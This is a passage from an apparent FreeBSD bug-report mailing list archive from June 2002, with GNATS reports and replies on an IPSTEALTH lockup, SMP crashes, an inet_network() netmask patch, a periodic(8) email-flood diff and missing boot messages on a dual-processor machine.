{ val <<= 8; val |= parts[i] & 0xff; To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 14:10:53 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 404D437B419 for ; Thu, 27 Jun 2002 14:10:03 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RLA3JU027290 for ; Thu, 27 Jun 2002 14:10:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RLA2WN027289; Thu, 27 Jun 2002 14:10:02 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id 9787537B416 for ; Thu, 27 Jun 2002 14:04:15 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RL4FOT040005 for ; Thu, 27 Jun 2002 14:04:15 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g5RL4Fkk040004; Thu, 27 Jun 2002 14:04:15 -0700 (PDT) Message-Id: <200206272104.g5RL4Fkk040004@www.freebsd.org> Date: Thu, 27 Jun 2002 14:04:15 -0700 (PDT) From: Chris Wasser To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/39937: ipstealth issue Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39937 >Category: kern >Synopsis: ipstealth issue >Confidential: no >Severity: serious >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Jun 27 14:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Chris Wasser >Release: 4.6-RELEASE >Organization: n/a >Environment: FreeBSD hanger18 4.6-RELEASE FreeBSD 4.6-RELEASE #2: Mon Jun 24 15:07:45 MDT 2002 root@hanger18:/usr/obj/usr/src/sys/UKCV1_PRODUCTION i386 >Description: If IPSTEALTH is enabled in the kernel (options IPSTEALTH) and the sysctl is set to 1, any attempts to use a bpf driven application such as dhclient will result in the machine locking up. I've tried tracing the lockup but it just spins around and around and I can't get a decent trace to give as it keeps cycling in the same functions over and over. >How-To-Repeat: In your kernel, enable ipstealth: options IPSTEALTH Tweak the sysctl option: sysctl net.inet.ip.stealth=1 Run dhclient on any interface: dhclient dc0 >Fix: Unsure. It may just be my own stupidity, but this definitely did not happen in 4.5-* >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 16:20:36 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7A9EC37B407 for ; Thu, 27 Jun 2002 16:20:09 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RNK8JU050627 for ; Thu, 27 Jun 2002 16:20:08 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RNK820050626; Thu, 27 Jun 2002 16:20:08 -0700 (PDT) Date: Thu, 27 Jun 2002 16:20:08 -0700 (PDT) Message-Id: <200206272320.g5RNK820050626@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Heiko Weber" Subject: Re: kern/39553: FreeBSD-4.6 halt on SMP machine Reply-To: "Heiko Weber" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/39553; it has been noted by GNATS. From: "Heiko Weber" To: , Cc: Subject: Re: kern/39553: FreeBSD-4.6 halt on SMP machine Date: Fri, 28 Jun 2002 01:10:07 +0200 Have an SMP machine here too, seems to be more stable than yours. But my machine crashes every evening at 20:04 PM (CEST). I looks like that an TCP data connection (which is opened in the morning at 9.00 AM - and is connected until the other end closed connection - this is normaly at 20:00 PM). 4 minutes later the machine goes down. This happens 5 days a week. This connection is only opened from monday to friday. On saterday and sunday the machine runs without any problem ... any idea ? Heiko heiko@wecos.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 16:30:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 53EB037B401 for ; Thu, 27 Jun 2002 16:30:09 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RNU5JU051708 for ; Thu, 27 Jun 2002 16:30:05 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RNU5Zk051707; Thu, 27 Jun 2002 16:30:05 -0700 (PDT) Date: Thu, 27 Jun 2002 16:30:05 -0700 (PDT) Message-Id: <200206272330.g5RNU5Zk051707@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Wei-Kai Wu Subject: Re: kern/39553: FreeBSD-4.6 halt on SMP machine Reply-To: Wei-Kai Wu Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/39553; it has been noted by GNATS. From: Wei-Kai Wu To: Heiko Weber Cc: freebsd-gnats-submit@FreeBSD.org Subject: Re: kern/39553: FreeBSD-4.6 halt on SMP machine Date: Fri, 28 Jun 2002 07:25:35 +0800 On Fri, Jun 28, 2002 at 01:10:07AM +0200, Heiko Weber wrote: > 4 minutes later the machine goes down. This happens 5 days a week. This > connection is only opened from monday to friday. On saterday and sunday the > machine runs without any problem ... any idea ? Is there any crontab running from Monday to Friday? And, the system is hanged or automatically rebooted? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 17:12:57 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 995DA37B420 for ; Thu, 27 Jun 2002 17:12:18 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5S0A6JU061022 for ; Thu, 27 Jun 2002 17:10:06 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5S0A5G1061018; Thu, 27 Jun 2002 17:10:05 -0700 (PDT) Date: Thu, 27 Jun 2002 17:10:05 -0700 (PDT) Message-Id: <200206280010.g5S0A5G1061018@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Jin Guojun[DSD]" Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Reply-To: "Jin Guojun[DSD]" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39896; it has been noted by GNATS. From: "Jin Guojun[DSD]" To: Ian Dowse Cc: "Crist J. Clark" , FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Date: Thu, 27 Jun 2002 17:03:08 -0700 Ian Dowse wrote: > > In message <200206271910.g5RJA4sI004556@freefall.freebsd.org>, "Crist J. Clark" > writes: > > Your error is here, > > > > > eubie# echo "/data -network 131.243.2 -mask 255.255.255.0" > /etc/exports > > ^ > > As I understand inet_network(3), you are refering to the network, > > > > 131.243.0.2 > > I'm not super-familiour with the intricacies of parsing <4 part IP > addresses, but if you look at the code or instrument mountd, you > will see that this is not the case for inet_network() (I think the > effect you refer to happens to IP addresses, not network numbers). > > Below is a simple patch for inet_network() that makes it support > 32-bit hex network numbers. It now also returns INADDR_NONE in a > few cases where previously the number would be silently truncated. > This could probably be improved upon. > > Ian > > Index: inet_network.c > =================================================================== > RCS file: /home/iedowse/CVS/src/lib/libc/net/inet_network.c,v > retrieving revision 1.6.2.1 > diff -u -r1.6.2.1 inet_network.c > --- inet_network.c 21 Apr 2001 14:53:04 -0000 1.6.2.1 > +++ inet_network.c 27 Jun 2002 19:55:06 -0000 > @@ -85,6 +85,8 @@ > return (INADDR_NONE); > *pp++ = val; > n = pp - parts; > + if (val > 0xff) > + return (n == 1 ? val : INADDR_NONE); > for (val = 0, i = 0; i < n; i++) { > val <<= 8; > val |= parts[i] & 0xff; Yup, it fixed the problem. I have looked and diffed mountd and related sources, but did not find any significant change. most files are not changed. inet_network.c is the same in both 4.5 and 4.6. How it works under 4.5 but not under 4.6 is a mystery. I will try to trace what happend in 4.6 a little further. If some developer feels something they changed may have affection to this, pleae send message to this liet, so we can benefit from it. To understand what causes the problem is more important than a fix. Thanks folks, -- ------------ Jin Guojun ----------- v --- j_guojun@lbl.gov --- Distributed Systems Department http://www.itg.lbl.gov/~jin M/S 50B-2239 Ph#:(510) 486-7531 Fax: 486-6363 Lawrence Berkeley National Laboratory, Berkeley, CA 94720 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 17:32:21 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 30F7537B401 for ; Thu, 27 Jun 2002 17:32:08 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5S0U6JU063469 for ; Thu, 27 Jun 2002 17:30:06 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5S0U6pi063468; Thu, 27 Jun 2002 17:30:06 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id D74A237B4F3 for ; Thu, 27 Jun 2002 17:29:46 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g5S0SLOT059821 for ; Thu, 27 Jun 2002 17:28:21 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g5S0SL84059820; Thu, 27 Jun 2002 17:28:21 -0700 (PDT) Message-Id: <200206280028.g5S0SL84059820@www.freebsd.org> Date: Thu, 27 Jun 2002 17:28:21 -0700 (PDT) From: Guolin Cheng To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: bin/39940: /usr/sbin/periodic sends thousands of emails Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39940 >Category: bin >Synopsis: /usr/sbin/periodic sends thousands of emails >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Jun 27 17:30:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Guolin Cheng >Release: FreeBSD 4.6, but same for all 4.* version >Organization: ALexa Internet. Inc. >Environment: FreeBSD rontmp.alexa.com 4.6-RELEASE FreeBSD 4.6-RELEASE #0: Fri Jun 21 20:37:42 GMT 2002 root@rontmp.alexa.com:/usr/src/sys/compile/ALEXA i386 >Description: The problems are: 1, /usr/sbin/periodic sends tons of email, when running hourly running scripts whether or not the latter generate outputs. Then email server will be overwhelmed if we have hundreds or thousands FreeBSD boxes. 2, periodic can not tell normal shell scripts from backup files ended with '~' and ',' , which are normally created by CVS/RVS/Perforce. it tries to run all executable files under base directory specified. 3, the coufiguration file */periodic.conf, which contain variable definition entries including _{show|output|...}, will confuse Bourne Shell interpreter when the basedir contains character '.', which is normal for directory name but not appropriate for shell variable name substitution. >How-To-Repeat: just create a directory /etc/periodic/hourly, and create a simply output-nothing shell script hahaha.sh under it: #! /bin/sh # do nothing and output nothing # echo "hahahaa... wrong :)" Set its executable mode bit and run the periodic with hourly directory as its argument.. sh -x /usr/sbin/periodic hourly Then copy the hahaha.sh to hahaha.sh~ and run the same command above, you will find that both shell scripts are processed! at last change the hourly directory name to cron.hourly name, and it will report problem even at beginning when processing the periodic.conf file! >Fix: To fix the problem, we need to tell periodic 1, skip shell scripts ended with '~' and '.', 2, substitute the '.' character to '_' in the periodic.conf and inform users about that special case, so that no base diretories like cron.daily and cron_daily exists at the same time. or if so, then the setting will overlaps. 3, send emails only when necessary, normally that means scripts under base directory generating outputs. The diff between original edited version of /usr/sbin/periodic are attached. shell> diff -c /usr/sbin/periodic /var/tmp/periodic *** /usr/sbin/periodic Mon Jun 10 21:19:56 2002 --- /var/tmp/periodic Thu Jun 27 15:10:53 2002 *************** *** 28,33 **** --- 28,34 ---- host=`hostname` export host tmp_output=`mktemp ${TMPDIR:-/tmp}/periodic.XXXXXXXXXX` + tmp_email_output=`mktemp ${TMPDIR:-/tmp}/periodic.XXXXXXXXXX` # Execute each executable file in the directory list. If the x bit is not # set, assume the user didn't really want us to muck with it (it's a *************** *** 35,42 **** for arg do # Where's our output going ? ! eval output=\$${arg##*/}_output case "$output" in /*) pipe="cat >>$output";; "") pipe=cat;; --- 36,47 ---- for arg do + # for special cases that the base directory has a '.' character contained, + # and difficult to change, then we can replace '.' with '_' in */period.conf, + # to pass the shell parameter name check for */periodic.conf + arg_in_conf=`echo $arg | tr '.' '_'` # Where's our output going ? ! eval output=\$${arg_in_conf##*/}_output case "$output" in /*) pipe="cat >>$output";; "") pipe=cat;; *************** *** 46,52 **** success=YES info=YES badconfig=NO # Defaults when ${run}_* aren't YES/NO for var in success info badconfig do ! case $(eval echo "\$${arg##*/}_show_$var") in [Yy][Ee][Ss]) eval $var=YES;; [Nn][Oo]) eval $var=NO;; esac --- 51,57 ---- success=YES info=YES badconfig=NO # Defaults when ${run}_* aren't YES/NO for var in success info badconfig do ! case $(eval echo "\$${arg_in_conf##*/}_show_$var") in [Yy][Ee][Ss]) eval $var=YES;; [Nn][Oo]) eval $var=NO;; esac *************** *** 72,79 **** processed=0 for dir in $dirlist do ! for file in $dir/* do if [ -x $file -a ! -d $file ] then output=TRUE --- 77,91 ---- processed=0 for dir in $dirlist do ! for file in $dir/*[^~,] ; ## Ignore *~ and *, scripts do + # Don't run *.{rpmsave,rpmorig,rpmnew,swp} scripts + [ "${file%.rpmsave}" != "${file}" ] && continue + [ "${file%.rpmorig}" != "${file}" ] && continue + [ "${file%.rpmnew}" != "${file}" ] && continue + [ "${file%.swp}" != "${file}" ] && continue + [ "${file%,v}" != "${file}" ] && continue + if [ -x $file -a ! -d $file ] then output=TRUE *************** *** 93,106 **** fi done done ! if [ $empty = TRUE ] ! then ! [ $processed = 1 ] && plural= || plural=s ! echo "No output from the $processed file$plural processed" ! else ! echo "" ! echo "-- End of $arg output --" ! fi ! } | eval $pipe done rm -f $tmp_output --- 105,124 ---- fi done done ! ## If there is no output from scripts processed, then we will not sendmail ! #if [ $empty = TRUE ] ! #then ! # [ $processed = 1 ] && plural= || plural=s ! # echo "No output from the $processed file$plural processed" ! #else ! # echo "" ! # echo "-- End of $arg output --" ! #fi ! } > $tmp_email_output ! if [ -s $tmp_email_output ] ; ! then ! cat $tmp_email_output | eval $pipe ! fi done rm -f $tmp_output + rm -f $tmp_email_output >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 17:40:29 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B77D737B405 for ; Thu, 27 Jun 2002 17:40:01 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5S0e1JU064866 for ; Thu, 27 Jun 2002 17:40:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5S0e1Z9064864; Thu, 27 Jun 2002 17:40:01 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id DC65037B476 for ; Thu, 27 Jun 2002 17:33:13 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g5S0RSOT059757 for ; Thu, 27 Jun 2002 17:27:28 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g5S0RSxR059756; Thu, 27 Jun 2002 17:27:28 -0700 (PDT) Message-Id: <200206280027.g5S0RSxR059756@www.freebsd.org> Date: Thu, 27 Jun 2002 17:27:28 -0700 (PDT) From: Guolin Cheng To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: bin/39941: /usr/sbin/periodic sends thousands of emails Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39941 >Category: bin >Synopsis: /usr/sbin/periodic sends thousands of emails >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Jun 27 17:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Guolin Cheng >Release: FreeBSD 4.6 >Organization: ALexa Internet. Inc. >Environment: FreeBSD rontmp.alexa.com 4.6-RELEASE FreeBSD 4.6-RELEASE #0: Fri Jun 21 20:37:42 GMT 2002 root@rontmp.alexa.com:/usr/src/sys/compile/ALEXA i386 >Description: The problems are: 1, /usr/sbin/periodic sends tons of email, when running hourly running scripts whether or not the latter generate outputs. Then email server will be overwhelmed if we have hundreds or thousands FreeBSD boxes. 2, periodic can not tell normal shell scripts from backup files ended with '~' and ',' , which are normally created by CVS/RVS/Perforce. it tries to run all executable files under base directory specified. 3, the coufiguration file */periodic.conf, which contain variable definition entries including _{show|output|...}, will confuse Bourne Shell interpreter when the basedir contains character '.', which is normal for directory name but not appropriate for shell variable name substitution. >How-To-Repeat: just create a directory /etc/periodic/hourly, and create a simply output-nothing shell script hahaha.sh under it: #! /bin/sh # do nothing and output nothing # echo "hahahaa... wrong :)" Set its executable mode bit and run the periodic with hourly directory as its argument.. sh -x /usr/sbin/periodic hourly Then copy the hahaha.sh to hahaha.sh~ and run the same command above, you will find that both shell scripts are processed! at last change the hourly directory name to cron.hourly name, and it will report problem even at beginning when processing the periodic.conf file! >Fix: To fix the problem, we need to tell periodic 1, skip shell scripts ended with '~' and '.', 2, substitute the '.' character to '_' in the periodic.conf and inform users about that special case, so that no base diretories like cron.daily and cron_daily exists at the same time. or if so, then the setting will overlaps. 3, send emails only when necessary, normally that means scripts under base directory generating outputs. The diff between original edited version of /usr/sbin/periodic are attached. shell> diff -c /usr/sbin/periodic /var/tmp/periodic *** /usr/sbin/periodic Mon Jun 10 21:19:56 2002 --- /var/tmp/periodic Thu Jun 27 15:10:53 2002 *************** *** 28,33 **** --- 28,34 ---- host=`hostname` export host tmp_output=`mktemp ${TMPDIR:-/tmp}/periodic.XXXXXXXXXX` + tmp_email_output=`mktemp ${TMPDIR:-/tmp}/periodic.XXXXXXXXXX` # Execute each executable file in the directory list. If the x bit is not # set, assume the user didn't really want us to muck with it (it's a *************** *** 35,42 **** for arg do # Where's our output going ? ! eval output=\$${arg##*/}_output case "$output" in /*) pipe="cat >>$output";; "") pipe=cat;; --- 36,47 ---- for arg do + # for special cases that the base directory has a '.' character contained, + # and difficult to change, then we can replace '.' with '_' in */period.conf, + # to pass the shell parameter name check for */periodic.conf + arg_in_conf=`echo $arg | tr '.' '_'` # Where's our output going ? ! eval output=\$${arg_in_conf##*/}_output case "$output" in /*) pipe="cat >>$output";; "") pipe=cat;; *************** *** 46,52 **** success=YES info=YES badconfig=NO # Defaults when ${run}_* aren't YES/NO for var in success info badconfig do ! case $(eval echo "\$${arg##*/}_show_$var") in [Yy][Ee][Ss]) eval $var=YES;; [Nn][Oo]) eval $var=NO;; esac --- 51,57 ---- success=YES info=YES badconfig=NO # Defaults when ${run}_* aren't YES/NO for var in success info badconfig do ! case $(eval echo "\$${arg_in_conf##*/}_show_$var") in [Yy][Ee][Ss]) eval $var=YES;; [Nn][Oo]) eval $var=NO;; esac *************** *** 72,79 **** processed=0 for dir in $dirlist do ! for file in $dir/* do if [ -x $file -a ! -d $file ] then output=TRUE --- 77,91 ---- processed=0 for dir in $dirlist do ! for file in $dir/*[^~,] ; ## Ignore *~ and *, scripts do + # Don't run *.{rpmsave,rpmorig,rpmnew,swp} scripts + [ "${file%.rpmsave}" != "${file}" ] && continue + [ "${file%.rpmorig}" != "${file}" ] && continue + [ "${file%.rpmnew}" != "${file}" ] && continue + [ "${file%.swp}" != "${file}" ] && continue + [ "${file%,v}" != "${file}" ] && continue + if [ -x $file -a ! -d $file ] then output=TRUE *************** *** 93,106 **** fi done done ! if [ $empty = TRUE ] ! then ! [ $processed = 1 ] && plural= || plural=s ! echo "No output from the $processed file$plural processed" ! else ! echo "" ! echo "-- End of $arg output --" ! fi ! } | eval $pipe done rm -f $tmp_output --- 105,124 ---- fi done done ! ## If there is no output from scripts processed, then we will not sendmail ! #if [ $empty = TRUE ] ! #then ! # [ $processed = 1 ] && plural= || plural=s ! # echo "No output from the $processed file$plural processed" ! #else ! # echo "" ! # echo "-- End of $arg output --" ! #fi ! } > $tmp_email_output ! if [ -s $tmp_email_output ] ; ! then ! cat $tmp_email_output | eval $pipe ! fi done rm -f $tmp_output + rm -f $tmp_email_output >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 18:40:24 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 650EE37B426 for ; Thu, 27 Jun 2002 18:40:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id A7F7443D44 for ; Thu, 27 Jun 2002 18:40:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5S1e2JU077776 for ; Thu, 27 Jun 2002 18:40:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5S1e2lh077775; Thu, 27 Jun 2002 18:40:02 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C593637B401 for ; Thu, 27 Jun 2002 18:31:44 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5D7F143D31 for ; Thu, 27 Jun 2002 18:31:44 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g5S0sqOT062237 for ; Thu, 27 Jun 2002 17:54:52 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g5S0sq8w062236; Thu, 27 Jun 2002 17:54:52 -0700 (PDT) Message-Id: <200206280054.g5S0sq8w062236@www.freebsd.org> Date: Thu, 27 Jun 2002 17:54:52 -0700 (PDT) From: marc rassbach To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/39942: 4.6-current does not play well with DG Aviion dual processor Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39942 >Category: kern >Synopsis: 4.6-current does not play well with DG Aviion dual processor >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Jun 27 18:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: marc rassbach >Release: 4.6-STABLE >Organization: milestone r/d labs >Environment: Errr, I can give a uname -a that works.... :-( $ uname -a FreeBSD tandem.milestonerdl.com 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Mon Jan 28 14:31:56 GMT 2002 murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC i386 About all that proves is the box works with 4.6-STABLE userspace and 4.5-RELEASE kernel. Not that useful, other than to say 'the hardware works' >Description: 4.5-RELEASE GENERIC and GENERIC with SMP enabled worked 4.5-STABLE from Feb 5th timeframe also worked. 4.6-STABLE updated Jun 26th doesn't work right. To show what's missing: Jun 27 15:16:54 tandem reboot: rebooted by root Jun 27 15:16:54 tandem syslogd: exiting on signal 15 Jun 27 15:18:47 tandem /kernel: memory = 536870912 (524288K bytes) Jun 27 15:18:47 tandem /kernel: avail memory = 517357568 (505232K bytes) Jun 27 15:18:47 tandem /kernel: Programming 16 pins in IOAPIC #0 Jun 27 15:18:47 tandem /kernel: EISA INTCONTROL = 00000200 Jun 27 15:18:47 tandem /kernel: IOAPIC #0 intpin 2 -> irq 0 Jun 27 15:18:47 tandem /kernel: FreeBSD/SMP: Multiprocessor motherboard Jun 27 15:18:47 tandem /kernel: cpu0 (BSP): apic id: 5, version: 0x00040011, at 0xfee00000 Jun 27 15:18:47 tandem /kernel: cpu1 (AP): apic id: 4, version: 0x00040011, at 0xfee00000 Jun 27 15:18:47 tandem /kernel: io0 (APIC): apic id: 0, version: 0x000f0011, at 0xfec00000 Notice how the copyright notice is missing? Now here is what I'm used to seeing.... Jun 27 14:11:36 tandem halt: halted by root Jun 27 14:11:36 tandem syslogd: exiting on signal 15 Jun 27 14:29:26 tandem /kernel: Copyright (c) 1992-2002 The FreeBSD Project. Jun 27 14:29:26 tandem /kernel: Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989 , 1991, 1992, 1993, 1994 Jun 27 14:29:26 tandem /kernel: The Regents of the University of California. All rights reserved. Jun 27 14:29:26 tandem /kernel: FreeBSD 4.5-RELEASE #0: Tue Feb 5 16:10:53 GMT 2002 Jun 27 14:29:26 tandem /kernel: root@tandem.milestonerdl.com:/usr/src/sys/compil e/DUAL Jun 27 14:29:26 tandem /kernel: Timecounter "i8254" frequency 1193182 Hz Jun 27 14:29:26 tandem /kernel: CPU: Pentium Pro (200.03-MHz 686-class CPU) Jun 27 14:29:26 tandem /kernel: Origin = "GenuineIntel" Id = 0x619 Stepping = 9 Jun 27 14:29:26 tandem /kernel: Features=0xfbff Jun 27 14:29:26 tandem /kernel: real memory = 536870912 (524288K bytes) Jun 27 14:29:26 tandem /kernel: avail memory = 517603328 (505472K bytes) Jun 27 14:29:26 tandem /kernel: Programming 16 pins in IOAPIC #0 Jun 27 14:29:26 tandem /kernel: EISA INTCONTROL = 00000200 Jun 27 14:29:26 tandem /kernel: IOAPIC #0 intpin 2 -> irq 0 Jun 27 14:29:26 tandem /kernel: FreeBSD/SMP: Multiprocessor motherboard Jun 27 14:29:26 tandem /kernel: cpu0 (BSP): apic id: 5, version: 0x00040011, at >How-To-Repeat: Be blessed with a dual 200 mhz pent pro box? I'm happy to allow someone remote login/enable debugging/what I can to help track down this 'feature' >Fix: :-( Sorry. No idea. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 18:55:23 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mako1.telstra.net (mako1.telstra.net [203.50.0.28]) by hub.freebsd.org (Postfix) with ESMTP id 6EFB837B406; Thu, 27 Jun 2002 18:55:17 -0700 (PDT) Received: from moon (rsdhcp2.telstra.net [203.50.0.194]) by mako1.telstra.net (8.11.3/8.11.1) with SMTP id g5S0Fxl47763; Fri, 28 Jun 2002 10:16:00 +1000 (EST) (envelope-from Ash@telstra.net) 